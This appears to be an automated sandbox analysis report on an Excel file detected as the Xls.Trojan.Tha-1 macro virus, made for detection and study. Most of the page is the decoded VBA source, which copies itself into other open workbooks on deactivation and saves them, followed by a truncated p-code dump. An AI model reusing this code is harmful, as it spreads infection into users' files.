MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The file is an Excel spreadsheet containing VBA macros. The macro code attempts to copy itself into other open workbooks, which is a common technique for malware to spread or maintain persistence. The ClamAV detection 'Xls.Trojan.Tha-1' further supports its malicious nature. No specific IOCs like URLs or file paths were directly extracted from the macro code.
Heuristics 2
-
ClamAV: Xls.Trojan.Tha-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Tha-1
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10446 bytes |
SHA-256: b8ea3830b3d9c16ea9b685221529ed31dfd817c67c3c2bae560a7c76dbbbc62f |
|||
|
Detection
ClamAV:
Xls.Trojan.Tha-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "DieseArbeitsmappe"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Deactivate()
Dim OurCode, ThaClass As String
Dim i As Integer
Dim Saved As Boolean
ThaClass = "DieseArbeitsmappe"
OurCode = Application.ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule.Lines(1, Application.ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
For i = 1 To Application.Workbooks.Count
Saved = False
For j = 1 To Application.Workbooks.Item(i).VBProject.VBComponents.Count
If Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines = 0 Then
If Application.Workbooks.Item(i).Path <> "" And Application.Workbooks.Item(i).Saved = True And Saved = False Then Saved = True
Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.InsertLines 1, OurCode
If Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).Name = ThaClass Then
Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.ReplaceLine 1, "Private Sub Workbook_Deactivate()"
Else
Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.ReplaceLine 1, "Private Sub Worksheet_Deactivate()"
End If
End If
Next j
If Saved = True Then Application.Workbooks.Item(i).Save
Next i
End Sub
Attribute VB_Name = "Tabelle1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_Deactivate()
Dim OurCode, ThaClass As String
Dim i As Integer
Dim Saved As Boolean
ThaClass = "DieseArbeitsmappe"
OurCode = Application.ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule.Lines(1, Application.ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
For i = 1 To Application.Workbooks.Count
Saved = False
For j = 1 To Application.Workbooks.Item(i).VBProject.VBComponents.Count
If Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines = 0 Then
If Application.Workbooks.Item(i).Path <> "" And Application.Workbooks.Item(i).Saved = True And Saved = False Then Saved = True
Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.InsertLines 1, OurCode
If Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).Name = ThaClass Then
Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.ReplaceLine 1, "Private Sub Workbook_Deactivate()"
Else
Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.ReplaceLine 1, "Private Sub Worksheet_Deactivate()"
End If
End If
Next j
If Saved = True Then Application.Workbooks.Item(i).Save
Next i
End Sub
' Processing file: /opt/analyzer/scan_staging/19123c0f9c2b4575accd6b0fb9b788b7.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/DieseArbeitsmappe - 8856 bytes
' Line #0:
' FuncDefn (Private Sub Workbook_Deactivate())
' Line #1:
' Line #2:
' Dim
' VarDefn ThisWorkbook
' VarDefn id_0292 (As String)
' Line #3:
' Dim
' VarDefn _B_var_For (As Integer)
' Line #4:
' Dim
' VarDefn Saved (As Boolean)
' Line #5:
' Line #6:
' LitStr 0x0011 "DieseArbeitsmappe"
' St id_0292
' Line #7:
' Line #8:
' LitDI2 0x0001
' LitDI2 0x0001
' Ld Application
' MemLd Lines
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd i
' MemLd _B_var_If
' LitDI2 0x0001
' Ld Application
' MemLd Lines
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd i
' ArgsMemLd CountOfLines 0x0002
' S
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.